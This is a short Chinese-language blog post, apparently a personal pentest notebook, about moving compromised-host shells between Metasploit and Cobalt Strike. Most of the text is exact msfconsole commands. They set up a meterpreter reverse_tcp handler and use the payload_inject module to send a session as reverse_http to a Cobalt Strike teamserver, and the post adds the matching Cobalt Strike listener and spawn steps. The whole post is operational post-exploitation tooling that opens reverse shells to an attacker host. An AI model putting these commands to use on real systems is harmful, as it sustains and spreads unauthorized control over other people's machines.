内网 | MSF Session ♻️ CS Shell

内网 | MSF Session ♻️ CS Shell

📍

这里记录一下 MSF 和 CS 这两个后渗透利器的 shell 转换。

CS Shell ♻️ MSF Session

条件是 CS 已经拿到一个 shell,且该机器已上线。

  1. 📍 首先 msf 利用 handler 模块监听:

    msf5> use exploit/multi/handler
    msf5> set LHOST 172.16.232.253 //kali监听的IP
    msf5> set LPORT 4747
    msf5> exploit

    或者一句话命令:

    msf5> handler -p windows/meterpreter/reverse_tcp -H 172.16.232.253 -P 4747 -x
  2. 📍 CS 中新建一个 Listener,设置为 windows/foreign/reverse_tcp,IP 和端口均填写 kali 的 IP 和端口。然后右键会话 👉🏻 spawn 👉🏻 选择刚才建立的 listener。或者在 session 处直接用命令:spawn xxx。然后 msf 会弹回 meterpreter 会话。

Screenshot 2020-03-02 下午10.25.52

MSF Session ♻️ CS Shell

条件与上面雷同,msf 弹回 session 之后,将其转换给 CS。

  1. 首先 CS 新监听一个 listener,选择 windows/beacon_http/reverse_http,IP 和端口都设置为 teamserver(172.16.232.1:9687)。

    ⚠️ 这里必须选择 windows/beacon_http/reverse_http

  2. msf 利用 payload_inject 模块:

    // 此时已获得有效的 session
    msf5> use exploit/windows/local/payload_inject
    msf5> set payload windows/meterpreter/reverse_http
    msf5> set disablepayloadhandler true
    msf5> set LHOST 172.16.232.1
    msf5> set LPORT 9687
    msf5> set session 2
    msf5> exploit

Screenshot 2020-03-02 下午10.56.35

CS 与 Armitage、Empire 的 shell 互转下次记录。

Hard work and no play makes Nick a dull boy.